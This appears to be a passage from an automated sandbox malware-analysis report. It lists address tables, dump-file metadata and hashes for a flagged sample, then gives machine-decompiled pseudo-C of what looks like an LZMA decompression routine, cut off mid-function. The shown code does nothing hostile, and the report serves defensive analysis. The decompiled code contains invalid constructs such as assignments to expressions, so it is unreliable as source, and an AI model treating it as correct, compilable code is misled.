                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00407447
                                                                                                                          0x004073ce
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00407120

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                          • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                                                          • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                                                          • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00407068() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						 *(_t613 - 0x84) = 0xa;
                                                                                                                          						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                          					} else {
                                                                                                                          						 *(__ebp - 0x84) = 9;
                                                                                                                          						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                          					}
                                                                                                                          					while(1) {
                                                                                                                          						 *(_t613 - 0x54) = _t606;
                                                                                                                          						while(1) {
                                                                                                                          							L133:
                                                                                                                          							_t531 =  *_t606;
                                                                                                                          							_t589 = _t531 & 0x0000ffff;
                                                                                                                          							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          								 *(_t613 - 0x40) = 1;
                                                                                                                          								_t532 = _t531 - (_t531 >> 5);
                                                                                                                          								 *_t606 = _t532;
                                                                                                                          							} else {
                                                                                                                          								 *(_t613 - 0x10) = _t565;
                                                                                                                          								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          							}
                                                                                                                          							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          								goto L139;
                                                                                                                          							}
                                                                                                                          							L137:
                                                                                                                          							if( *(_t613 - 0x6c) == 0) {
                                                                                                                          								 *(_t613 - 0x88) = 5;
                                                                                                                          								L170:
                                                                                                                          								_t568 = 0x22;
                                                                                                                          								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          								_t535 = 0;
                                                                                                                          								L172:
                                                                                                                          								return _t535;
                                                                                                                          							}
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          							L139:
                                                                                                                          							_t533 =  *(_t613 - 0x84);
                                                                                                                          							while(1) {
                                                                                                                          								 *(_t613 - 0x88) = _t533;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t534 =  *(_t613 - 0x88);
                                                                                                                          									if(_t534 > 0x1c) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                          										case 0:
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											_t534 =  *( *(_t613 - 0x70));
                                                                                                                          											if(_t534 > 0xe1) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											_t538 = _t534 & 0x000000ff;
                                                                                                                          											_push(0x2d);
                                                                                                                          											asm("cdq");
                                                                                                                          											_pop(_t570);
                                                                                                                          											_push(9);
                                                                                                                          											_pop(_t571);
                                                                                                                          											_t609 = _t538 / _t570;
                                                                                                                          											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          											asm("cdq");
                                                                                                                          											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                          											 *(_t613 - 0x3c) = _t604;
                                                                                                                          											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          												L10:
                                                                                                                          												if(_t612 == 0) {
                                                                                                                          													L12:
                                                                                                                          													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          													goto L15;
                                                                                                                          												} else {
                                                                                                                          													goto L11;
                                                                                                                          												}
                                                                                                                          												do {
                                                                                                                          													L11:
                                                                                                                          													_t612 = _t612 - 1;
                                                                                                                          													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          												} while (_t612 != 0);
                                                                                                                          												goto L12;
                                                                                                                          											}
                                                                                                                          											if( *(_t613 - 4) != 0) {
                                                                                                                          												GlobalFree( *(_t613 - 4));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          											 *(_t613 - 4) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          												goto L10;
                                                                                                                          											}
                                                                                                                          										case 1:
                                                                                                                          											L13:
                                                                                                                          											__eflags =  *(_t613 - 0x6c);
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												 *(_t613 - 0x88) = 1;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											_t45 = _t613 - 0x48;
                                                                                                                          											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          											__eflags =  *_t45;
                                                                                                                          											L15:
                                                                                                                          											if( *(_t613 - 0x48) < 4) {
                                                                                                                          												goto L13;
                                                                                                                          											}
                                                                                                                          											_t546 =  *(_t613 - 0x40);
                                                                                                                          											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                          												L20:
                                                                                                                          												 *(_t613 - 0x48) = 5;
                                                                                                                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x74) = _t546;
                                                                                                                          											if( *(_t613 - 8) != 0) {
                                                                                                                          												GlobalFree( *(_t613 - 8));
                                                                                                                          											}
                                                                                                                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          											 *(_t613 - 8) = _t534;
                                                                                                                          											if(_t534 == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											} else {
                                                                                                                          												goto L20;
                                                                                                                          											}
                                                                                                                          										case 2:
                                                                                                                          											L24:
                                                                                                                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          											 *(_t613 - 0x84) = 6;
                                                                                                                          											 *(_t613 - 0x4c) = _t553;
                                                                                                                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                          											 *(_t613 - 0x54) = _t606;
                                                                                                                          											goto L133;
                                                                                                                          										case 3:
                                                                                                                          											L21:
                                                                                                                          											__eflags =  *(_t613 - 0x6c);
                                                                                                                          											if( *(_t613 - 0x6c) == 0) {
                                                                                                                          												 *(_t613 - 0x88) = 3;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          											_t67 = _t613 - 0x70;
                                                                                                                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          											__eflags =  *_t67;
                                                                                                                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          											L23:
                                                                                                                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          											if( *(_t613 - 0x48) != 0) {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          											goto L24;
                                                                                                                          										case 4:
                                                                                                                          											L133:
                                                                                                                          											_t531 =  *_t606;
                                                                                                                          											_t589 = _t531 & 0x0000ffff;
                                                                                                                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          												 *(_t613 - 0x40) = 1;
                                                                                                                          												_t532 = _t531 - (_t531 >> 5);
                                                                                                                          												 *_t606 = _t532;
                                                                                                                          											} else {
                                                                                                                          												 *(_t613 - 0x10) = _t565;
                                                                                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          											}
                                                                                                                          											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          												goto L139;
                                                                                                                          											}
                                                                                                                          										case 5:
                                                                                                                          											goto L137;
                                                                                                                          										case 6:
                                                                                                                          											__edx = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) = 1;
                                                                                                                          												 *(__ebp - 0x84) = 7;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          											__esi =  *(__ebp - 0x60);
                                                                                                                          											__cl = 8;
                                                                                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          											__ecx =  *(__ebp - 0x3c);
                                                                                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          											if( *(__ebp - 0x38) >= 4) {
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          													_t98 = __ebp - 0x38;
                                                                                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          													__eflags =  *_t98;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x38) = 0;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          											if( *(__ebp - 0x34) == __edx) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												goto L61;
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 8);
                                                                                                                          												__ebx = 0;
                                                                                                                          												__ebx = 1;
                                                                                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          												goto L41;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                          											if( *(__ebp - 0x40) != 1) {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          												 *(__ebp - 0x80) = 0x16;
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x28);
                                                                                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          												__eax = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          												__al = __al & 0x000000fd;
                                                                                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *(__ebp - 0x58) = __eax;
                                                                                                                          												goto L69;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											__ecx =  *(__ebp - 0x38);
                                                                                                                          											 *(__ebp - 0x84) = 8;
                                                                                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                          											while(1) {
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          										case 8:
                                                                                                                          											goto L0;
                                                                                                                          										case 9:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												goto L89;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x60);
                                                                                                                          											if( *(__ebp - 0x60) == 0) {
                                                                                                                          												goto L171;
                                                                                                                          											}
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                          											__eflags = _t258;
                                                                                                                          											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                          											goto L75;
                                                                                                                          										case 0xa:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 4);
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x84) = 0xb;
                                                                                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x28);
                                                                                                                          											goto L88;
                                                                                                                          										case 0xb:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x24);
                                                                                                                          												__eax =  *(__ebp - 0x20);
                                                                                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                          											} else {
                                                                                                                          												__eax =  *(__ebp - 0x24);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x28);
                                                                                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                          											L88:
                                                                                                                          											__ecx =  *(__ebp - 0x2c);
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          											L89:
                                                                                                                          											__eax =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x80) = 0x15;
                                                                                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          											goto L69;
                                                                                                                          										case 0xc:
                                                                                                                          											L99:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xc;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t334 = __ebp - 0x70;
                                                                                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t334;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											goto L101;
                                                                                                                          										case 0xd:
                                                                                                                          											L37:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xd;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t122 = __ebp - 0x70;
                                                                                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t122;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L39:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                          												goto L48;
                                                                                                                          											}
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												goto L54;
                                                                                                                          											}
                                                                                                                          											L41:
                                                                                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                          											 *(__ebp - 0x48) = __eax;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eax = __eax << 8;
                                                                                                                          											__eax = __eax + __ebx;
                                                                                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edx = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												 *(__ebp - 0x40) = 1;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												__ebx = __ebx + __ebx + 1;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
